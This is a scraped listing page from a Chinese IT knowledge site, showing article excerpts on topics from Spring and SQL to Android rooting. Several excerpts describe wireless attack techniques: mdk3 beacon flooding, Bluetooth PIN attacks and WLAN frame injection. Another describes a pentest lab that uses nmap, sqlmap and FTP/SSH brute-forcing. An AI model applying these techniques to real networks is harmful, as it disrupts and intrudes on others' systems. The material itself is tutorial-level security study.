<div>1.BeaconFloodMode(mdk3wlanXb):BeaconFloodMode是一种攻击功能,它通过发送大量的伪造无线Beacon帧来干扰目标无线网络。Beacon帧用于在无线网络中广播网络的存在,并包含有关网络的信息,如网络名称(ESSID)、加密类型、频段等。攻击者利用这一点通过发送大量的伪造Beacon帧,使目标网络的Beacon帧过于频繁,导致网络拥塞和干扰。这可能会对网络的性</div> </li> <li><a href="/article/1759775295814070272.htm" title="kali无线渗透之蓝牙攻击与原理" target="_blank">kali无线渗透之蓝牙攻击与原理</a> <span class="text-muted">想拿 0day 的脚步小子</span> <a class="tag" taget="_blank" href="/search/kali%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.htm">kali无线渗透</a><a class="tag" taget="_blank" href="/search/%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.htm">无线渗透</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F/1.htm">渗透</a><a class="tag" taget="_blank" href="/search/%E8%93%9D%E7%89%99/1.htm">蓝牙</a><a class="tag" taget="_blank" href="/search/%E8%93%9D%E7%89%99%E6%B8%97%E9%80%8F/1.htm">蓝牙渗透</a> <div>原理蓝牙网络中的“个人身份码”攻击传统的蓝牙设备,主要是指“蓝牙规范2.1版”以前的各版蓝牙设备,以及使用“安全简化配对”(SecureSimplePairing,SSP)协议的蓝牙设备。这些传统的蓝牙设备仅仅依赖于“个人身份码”(PersonalldentificationNumber,PIN)的有效性作为唯一的认证规则,只要通信双方的蓝牙设备使用了相同的“个人身份码",就认为通过认证,否则就认</div> </li> <li><a href="/article/1759775166407208960.htm" title="kali无线渗透之WLAN窃取和注入数据2" target="_blank">kali无线渗透之WLAN窃取和注入数据2</a> <span class="text-muted">想拿 0day 的脚步小子</span> <a class="tag" taget="_blank" href="/search/kali%E6%97%A0%E7%BA%BF%E6%B8%97%E9%80%8F/1.htm">kali无线渗透</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8/1.htm">系统安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>WLAN帧简介WLAN(WirelessLocalAreaNetwork)帧是在无线局域网中用于数据传输的基本单位。WLAN帧的结构可以根据具体的协议标准,如IEEE802.11(Wi-Fi)而有所不同。下面是IEEE802.11标准中WLAN帧的详细介绍:1.帧控制字段(FrameControlField):帧控制字段包含16个比特,用于标识帧的类型、子类型和其他控制信息。其中包括帧的类型(管理</div> </li> <li><a href="/article/1759765607684861952.htm" title="Android 源码编译和刷机ROOT" target="_blank">Android 源码编译和刷机ROOT</a> <span class="text-muted">鸡蛋绝缘体</span> <div>手机基于Pixel2XL环境基于VMWARE:KaliLinux镜像基于Android10(Q)VMWARE拖拽缓存清除:rm-rf/root/.cache/vmware/drag_and_drop/*VMWARE记得随手打快照1先解锁#Checkversionshouldbesameifyouhaveusedsdkmanager#Checkversiontoensurethetoolsareru</div> </li> <li><a href="/article/1759670631663759360.htm" title="面试经验分享 | 通关某公司面试靶场" target="_blank">面试经验分享 | 通关某公司面试靶场</a> <span class="text-muted">zkzq</span> <a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/%E7%BB%8F%E9%AA%8C%E5%88%86%E4%BA%AB/1.htm">经验分享</a><a class="tag" taget="_blank" href="/search/%E8%81%8C%E5%9C%BA%E5%92%8C%E5%8F%91%E5%B1%95/1.htm">职场和发展</a> <div>本文由掌控安全学院-冰封小天堂投稿0x00:探测IP首先打开时候长这个样,一开始感觉是迷惑行为,试了试/admin,/login这些发现都没有随后F12查看网络,看到几个js文件带有传参,就丢sqlmap跑了一下无果随后也反查了域名一下,发现没有域名,是阿里云的,这里突然醒悟,我第一步是信息收集。kalilinux启动,nmap启动,直接常规扫描一波,发现开启了这么多,ftp和ssh可以爆破,但因</div> </li> <li><a href="/article/1759536294414872576.htm" title="成为一名月薪2万的web安全工程师需要哪些技能?" target="_blank">成为一名月薪2万的web安全工程师需要哪些技能?</a> <span class="text-muted">闪现码狗</span> <div>现在web安全工程师比较火,岗位比较稀缺,现在除了一些大公司对学历要求严格,其余公司看中的大部分是能力。之前有个咨询的17岁的小伙子学习的就是相关方向,17岁,已经工作2年了……当初也是因为其他的要求比较高,所以才选择的web安全方向。那么成为一名web安全工程师需要哪些技能呢?下面就告诉你。01环境的搭建熟悉基本的虚拟机配置。Kalilinux,centos,Windows实验虚拟机自己搭建II</div> </li> <li><a href="/article/119.htm" title="Spring中@Value注解,需要注意的地方" target="_blank">Spring中@Value注解,需要注意的地方</a> <span class="text-muted">无量</span> <a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/bean/1.htm">bean</a><a class="tag" taget="_blank" href="/search/%40Value/1.htm">@Value</a><a class="tag" taget="_blank" href="/search/xml/1.htm">xml</a> <div>Spring 3以后,支持@Value注解的方式获取properties文件中的配置值,简化了读取配置文件的复杂操作 1、在applicationContext.xml文件(或引用文件中)中配置properties文件 <bean id="appProperty" class="org.springframework.beans.fac</div> </li> <li><a href="/article/246.htm" title="mongoDB 分片" target="_blank">mongoDB 分片</a> <span class="text-muted">开窍的石头</span> <a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a> <div>    mongoDB的分片。要mongos查询数据时候 先查询configsvr看数据在那台shard上,configsvr上边放的是metar信息,指的是那条数据在那个片上。由此可以看出mongo在做分片的时候咱们至少要有一个configsvr,和两个以上的shard(片)信息。     第一步启动两台以上的mongo服务 &nb</div> </li> <li><a href="/article/373.htm" title="OVER(PARTITION BY)函数用法" target="_blank">OVER(PARTITION BY)函数用法</a> <span class="text-muted">0624chenhong</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a> <div>这篇写得很好,引自 http://www.cnblogs.com/lanzi/archive/2010/10/26/1861338.html OVER(PARTITION BY)函数用法 2010年10月26日 OVER(PARTITION BY)函数介绍 开窗函数        &nb</div> </li> <li><a href="/article/500.htm" title="Android开发中,ADB server didn't ACK 解决方法" target="_blank">Android开发中,ADB server didn't ACK 解决方法</a> <span class="text-muted">一炮送你回车库</span> <a class="tag" taget="_blank" href="/search/Android%E5%BC%80%E5%8F%91/1.htm">Android开发</a> <div>首先通知:凡是安装360、豌豆荚、腾讯管家的全部卸载,然后再尝试。   一直没搞明白这个问题咋出现的,但今天看到一个方法,搞定了!原来是豌豆荚占用了 5037 端口导致。 参见原文章:一个豌豆荚引发的血案——关于ADB server didn't ACK的问题 简单来讲,首先将Windows任务进程中的豌豆荚干掉,如果还是不行,再继续按下列步骤排查。 &nb</div> </li> <li><a href="/article/627.htm" title="canvas中的像素绘制问题" target="_blank">canvas中的像素绘制问题</a> <span class="text-muted">换个号韩国红果果</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/canvas/1.htm">canvas</a> <div>pixl的绘制,1.如果绘制点正处于相邻像素交叉线,绘制x像素的线宽,则从交叉线分别向前向后绘制x/2个像素,如果x/2是整数,则刚好填满x个像素,如果是小数,则先把整数格填满,再去绘制剩下的小数部分,绘制时,是将小数部分的颜色用来除以一个像素的宽度,颜色会变淡。所以要用整数坐标来画的话(即绘制点正处于相邻像素交叉线时),线宽必须是2的整数倍。否则会出现不饱满的像素。 2.如果绘制点为一个像素的</div> </li> <li><a href="/article/754.htm" title="编码乱码问题" target="_blank">编码乱码问题</a> <span class="text-muted">灵静志远</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/jvm/1.htm">jvm</a><a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a><a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A0%81/1.htm">编码</a> <div>1、JVM中单个字符占用的字节长度跟编码方式有关,而默认编码方式又跟平台是一一对应的或说平台决定了默认字符编码方式;2、对于单个字符:ISO-8859-1单字节编码,GBK双字节编码,UTF-8三字节编码;因此中文平台(中文平台默认字符集编码GBK)下一个中文字符占2个字节,而英文平台(英文平台默认字符集编码Cp1252(类似于ISO-8859-1))。 3、getBytes()、getByte</div> </li> <li><a href="/article/881.htm" title="java 求几个月后的日期" target="_blank">java 求几个月后的日期</a> <span class="text-muted">darkranger</span> <a class="tag" taget="_blank" href="/search/calendar/1.htm">calendar</a><a class="tag" taget="_blank" href="/search/getinstance/1.htm">getinstance</a> <div>Date plandate = planDate.toDate(); SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd"); Calendar cal = Calendar.getInstance(); cal.setTime(plandate); // 取得三个月后时间 cal.add(Calendar.M</div> </li> <li><a href="/article/1008.htm" title="数据库设计的三大范式(通俗易懂)" target="_blank">数据库设计的三大范式(通俗易懂)</a> <span class="text-muted">aijuans</span> <a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93%E5%A4%8D%E4%B9%A0/1.htm">数据库复习</a> <div>关系数据库中的关系必须满足一定的要求。满足不同程度要求的为不同范式。数据库的设计范式是数据库设计所需要满足的规范。只有理解数据库的设计范式,才能设计出高效率、优雅的数据库,否则可能会设计出错误的数据库. 目前,主要有六种范式:第一范式、第二范式、第三范式、BC范式、第四范式和第五范式。满足最低要求的叫第一范式,简称1NF。在第一范式基础上进一步满足一些要求的为第二范式,简称2NF。其余依此类推。</div> </li> <li><a href="/article/1135.htm" title="想学工作流怎么入手" target="_blank">想学工作流怎么入手</a> <span class="text-muted">atongyeye</span> <a class="tag" taget="_blank" href="/search/jbpm/1.htm">jbpm</a> <div>工作流在工作中变得越来越重要,很多朋友想学工作流却不知如何入手。 很多朋友习惯性的这看一点,那了解一点,既不系统,也容易半途而废。好比学武功,最好的办法是有一本武功秘籍。研究明白,则犹如打通任督二脉。 系统学习工作流,很重要的一本书《JBPM工作流开发指南》。 本人苦苦学习两个月,基本上可以解决大部分流程问题。整理一下学习思路,有兴趣的朋友可以参考下。 1  首先要</div> </li> <li><a href="/article/1262.htm" title="Context和SQLiteOpenHelper创建数据库" target="_blank">Context和SQLiteOpenHelper创建数据库</a> <span class="text-muted">百合不是茶</span> <a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/Context%E5%88%9B%E5%BB%BA%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">Context创建数据库</a> <div>       一直以为安卓数据库的创建就是使用SQLiteOpenHelper创建,但是最近在android的一本书上看到了Context也可以创建数据库,下面我们一起分析这两种方式创建数据库的方式和区别,重点在SQLiteOpenHelper     一:SQLiteOpenHelper创建数据库:   1,SQLi</div> </li> <li><a href="/article/1389.htm" title="浅谈group by和distinct" target="_blank">浅谈group by和distinct</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/group+by/1.htm">group by</a><a class="tag" taget="_blank" href="/search/distinct/1.htm">distinct</a> <div>        group by和distinct只了去重意义一样,但是group by应用范围更广泛些,如分组汇总或者从聚合函数里筛选数据等。         譬如:统计每id数并且只显示数大于3 select id ,count(id) from ta</div> </li> <li><a href="/article/1516.htm" title="vi opertion" target="_blank">vi opertion</a> <span class="text-muted">征客丶</span> <a class="tag" taget="_blank" href="/search/mac/1.htm">mac</a><a class="tag" taget="_blank" href="/search/opration/1.htm">opration</a><a class="tag" taget="_blank" href="/search/vi/1.htm">vi</a> <div>进入 command mode (命令行模式) 按 esc 键 再按 shift + 冒号 注:以下命令中 带 $ 【在命令行模式下进行】,不带 $ 【在非命令行模式下进行】 一、文件操作 1.1、强制退出不保存 $ q! 1.2、保存 $ w 1.3、保存并退出 $ wq 1.4、刷新或重新加载已打开的文件 $ e 二、光标移动 2.1、跳到指定行 数字</div> </li> <li><a href="/article/1643.htm" title="【Spark十四】深入Spark RDD第三部分RDD基本API" target="_blank">【Spark十四】深入Spark RDD第三部分RDD基本API</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/spark/1.htm">spark</a> <div>  对于K/V类型的RDD,如下操作是什么含义?   val rdd = sc.parallelize(List(("A",3),("C",6),("A",1),("B",5)) rdd.reduceByKey(_+_).collect  reduceByKey在这里的操作,是把</div> </li> <li><a href="/article/1770.htm" title="java类加载机制" target="_blank">java类加载机制</a> <span class="text-muted">BlueSkator</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E8%99%9A%E6%8B%9F%E6%9C%BA/1.htm">虚拟机</a> <div>java类加载机制 1.java类加载器的树状结构 引导类加载器 ^ | 扩展类加载器 ^ | 系统类加载器 java使用代理模式来完成类加载,java的类加载器也有类似于继承的关系,引导类是最顶层的加载器,它是所有类的根加载器,它负责加载java核心库。当一个类加载器接到装载类到虚拟机的请求时,通常会代理给父类加载器,若已经是根加载器了,就自己完成加载。 虚拟机区分一个Cla</div> </li> <li><a href="/article/1897.htm" title="动态添加文本框" target="_blank">动态添加文本框</a> <span class="text-muted">BreakingBad</span> <a class="tag" taget="_blank" href="/search/%E6%96%87%E6%9C%AC%E6%A1%86/1.htm">文本框</a> <div>  <script>     var num=1; function AddInput() {      var str="";     str+="<input </div> </li> <li><a href="/article/2024.htm" title="读《研磨设计模式》-代码笔记-单例模式" target="_blank">读《研磨设计模式》-代码笔记-单例模式</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a> <div>声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ public class Singleton { } /* * 懒汉模式。注意,getInstance如果在多线程环境中调用,需要加上synchronized,否则存在线程不安全问题 */ class LazySingleton</div> </li> <li><a href="/article/2151.htm" title="iOS应用打包发布常见问题" target="_blank">iOS应用打包发布常见问题</a> <span class="text-muted">chenhbc</span> <a class="tag" taget="_blank" href="/search/ios/1.htm">ios</a><a class="tag" taget="_blank" href="/search/iOS%E5%8F%91%E5%B8%83/1.htm">iOS发布</a><a class="tag" taget="_blank" href="/search/iOS%E4%B8%8A%E4%BC%A0/1.htm">iOS上传</a><a class="tag" taget="_blank" href="/search/iOS%E6%89%93%E5%8C%85/1.htm">iOS打包</a> <div>这个月公司安排我一个人做iOS客户端开发,由于急着用,我先发布一个版本,由于第一次发布iOS应用,期间出了不少问题,记录于此。   1、使用Application Loader 发布时报错:Communication error.please use diagnostic mode to check connectivity.you need to have outbound acc</div> </li> <li><a href="/article/2278.htm" title="工作流复杂拓扑结构处理新思路" target="_blank">工作流复杂拓扑结构处理新思路</a> <span class="text-muted">comsci</span> <a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/%E4%BC%81%E4%B8%9A%E5%BA%94%E7%94%A8/1.htm">企业应用</a><a class="tag" taget="_blank" href="/search/OO/1.htm">OO</a> <div> 我们走的设计路线和国外的产品不太一样,不一样在哪里呢?  国外的流程的设计思路是通过事先定义一整套规则(类似XPDL)来约束和控制流程图的复杂度(我对国外的产品了解不够多,仅仅是在有限的了解程度上面提出这样的看法),从而避免在流程引擎中处理这些复杂的图的问题,而我们却没有通过事先定义这样的复杂的规则来约束和降低用户自定义流程图的灵活性,这样一来,在引擎和流程流转控制这一个层面就会遇到很</div> </li> <li><a href="/article/2405.htm" title="oracle 11g新特性Flashback data archive" target="_blank">oracle 11g新特性Flashback data archive</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a> <div>1. 什么是flashback data archive Flashback data archive是oracle 11g中引入的一个新特性。Flashback archive是一个新的数据库对象,用于存储一个或多表的历史数据。Flashback archive是一个逻辑对象,概念上类似于表空间。实际上flashback archive可以看作是存储一个或多个表的所有事务变化的逻辑空间。 </div> </li> <li><a href="/article/2532.htm" title="多叉树:2-3-4树" target="_blank">多叉树:2-3-4树</a> <span class="text-muted">dieslrae</span> <a class="tag" taget="_blank" href="/search/%E6%A0%91/1.htm">树</a> <div>    平衡树多叉树,每个节点最多有4个子节点和3个数据项,2,3,4的含义是指一个节点可能含有的子节点的个数,效率比红黑树稍差.一般不允许出现重复关键字值.2-3-4树有以下特征:     1、有一个数据项的节点总是有2个子节点(称为2-节点)     2、有两个数据项的节点总是有3个子节点(称为3-节</div> </li> <li><a href="/article/2659.htm" title="C语言学习七动态分配 malloc的使用" target="_blank">C语言学习七动态分配 malloc的使用</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/c/1.htm">c</a><a class="tag" taget="_blank" href="/search/language/1.htm">language</a><a class="tag" taget="_blank" href="/search/malloc/1.htm">malloc</a> <div>/* 2013年3月15日15:16:24 malloc 就memory(内存) allocate(分配)的缩写 本程序没有实际含义,只是理解使用 */ # include <stdio.h> # include <malloc.h> int main(void) { int i = 5; //分配了4个字节 静态分配 int * p </div> </li> <li><a href="/article/2786.htm" title="Objective-C编码规范[译]" target="_blank">Objective-C编码规范[译]</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/%E4%BB%A3%E7%A0%81%E8%A7%84%E8%8C%83/1.htm">代码规范</a> <div>  原文链接 : The official raywenderlich.com Objective-C style guide 原文作者 : raywenderlich.com Team 译文出自 : raywenderlich.com Objective-C编码规范 译者 : Sam Lau </div> </li> <li><a href="/article/2913.htm" title="0.性能优化-目录" target="_blank">0.性能优化-目录</a> <span class="text-muted">frank1234</span> <a class="tag" taget="_blank" href="/search/%E6%80%A7%E8%83%BD%E4%BC%98%E5%8C%96/1.htm">性能优化</a> <div>从今天开始笔者陆续发表一些性能测试相关的文章,主要是对自己前段时间学习的总结,由于水平有限,性能测试领域很深,本人理解的也比较浅,欢迎各位大咖批评指正。 主要内容包括: 一、性能测试指标 吞吐量、TPS、响应时间、负载、可扩展性、PV、思考时间 http://frank1234.iteye.com/blog/2180305 二、性能测试策略 生产环境相同 基准测试 预热等 htt</div> </li> <li><a href="/article/3040.htm" title="Java父类取得子类传递的泛型参数Class类型" target="_blank">Java父类取得子类传递的泛型参数Class类型</a> <span class="text-muted">happyqing</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E6%B3%9B%E5%9E%8B/1.htm">泛型</a><a class="tag" taget="_blank" href="/search/%E7%88%B6%E7%B1%BB/1.htm">父类</a><a class="tag" taget="_blank" href="/search/%E5%AD%90%E7%B1%BB/1.htm">子类</a><a class="tag" taget="_blank" href="/search/Class/1.htm">Class</a> <div>  import java.lang.reflect.ParameterizedType; import java.lang.reflect.Type; import org.junit.Test; abstract class BaseDao<T> { public void getType() { //Class<E> clazz =</div> </li> <li><a href="/article/3167.htm" title="跟我学SpringMVC目录汇总贴、PDF下载、源码下载" target="_blank">跟我学SpringMVC目录汇总贴、PDF下载、源码下载</a> <span class="text-muted">jinnianshilongnian</span> <a class="tag" taget="_blank" href="/search/springMVC/1.htm">springMVC</a> <div>  ----广告-------------------------------------------------------------- 网站核心商详页开发 掌握Java技术,掌握并发/异步工具使用,熟悉spring、ibatis框架; 掌握数据库技术,表设计和索引优化,分库分表/读写分离; 了解缓存技术,熟练使用如Redis/Memcached等主流技术; 了解Ngin</div> </li> <li><a href="/article/3294.htm" title="the HTTP rewrite module requires the PCRE library" target="_blank">the HTTP rewrite module requires the PCRE library</a> <span class="text-muted">流浪鱼</span> <a class="tag" taget="_blank" href="/search/rewrite/1.htm">rewrite</a> <div>./configure: error: the HTTP rewrite module requires the PCRE library. 模块依赖性Nginx需要依赖下面3个包 1. gzip 模块需要 zlib 库 ( 下载: http://www.zlib.net/ ) 2. rewrite 模块需要 pcre 库 ( 下载: http://www.pcre.org/ ) 3. s</div> </li> <li><a href="/article/3421.htm" title="第12章 Ajax(中)" target="_blank">第12章 Ajax(中)</a> <span class="text-muted">onestopweb</span> <a class="tag" taget="_blank" href="/search/Ajax/1.htm">Ajax</a> <div>index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/</div> </li> <li><a href="/article/3548.htm" title="Optimize query with Query Stripping in Web Intelligence" target="_blank">Optimize query with Query Stripping in Web Intelligence</a> <span class="text-muted">blueoxygen</span> <a class="tag" taget="_blank" href="/search/BO/1.htm">BO</a> <div>http://wiki.sdn.sap.com/wiki/display/BOBJ/Optimize+query+with+Query+Stripping+in+Web+Intelligence and a very straightfoward video http://www.sdn.sap.com/irj/scn/events?rid=/library/uuid/40ec3a0c-936</div> </li> <li><a href="/article/3675.htm" title="Java开发者写SQL时常犯的10个错误" target="_blank">Java开发者写SQL时常犯的10个错误</a> <span class="text-muted">tomcat_oracle</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a> <div>1、不用PreparedStatements   有意思的是,在JDBC出现了许多年后的今天,这个错误依然出现在博客、论坛和邮件列表中,即便要记住和理解它是一件很简单的事。开发者不使用PreparedStatements的原因可能有如下几个:   他们对PreparedStatements不了解   他们认为使用PreparedStatements太慢了   他们认为写Prepar</div> </li> <li><a href="/article/3802.htm" title="世纪互联与结盟有感" target="_blank">世纪互联与结盟有感</a> <span class="text-muted">阿尔萨斯</span> <div> 10月10日,世纪互联与(Foxcon)签约成立合资公司,有感。 全球电子制造业巨头(全球500强企业)与世纪互联共同看好IDC、云计算等业务在中国的增长空间,双方迅速果断出手,在资本层面上达成合作,此举体现了全球电子制造业巨头对世纪互联IDC业务的欣赏与信任,另一方面反映出世纪互联目前良好的运营状况与广阔的发展前景。 众所周知,精于电子产品制造(世界第一),对于世纪互联而言,能够与结盟</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类:</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved. <!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>--> </div> </div> </footer> <!-- 代码高亮 --> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>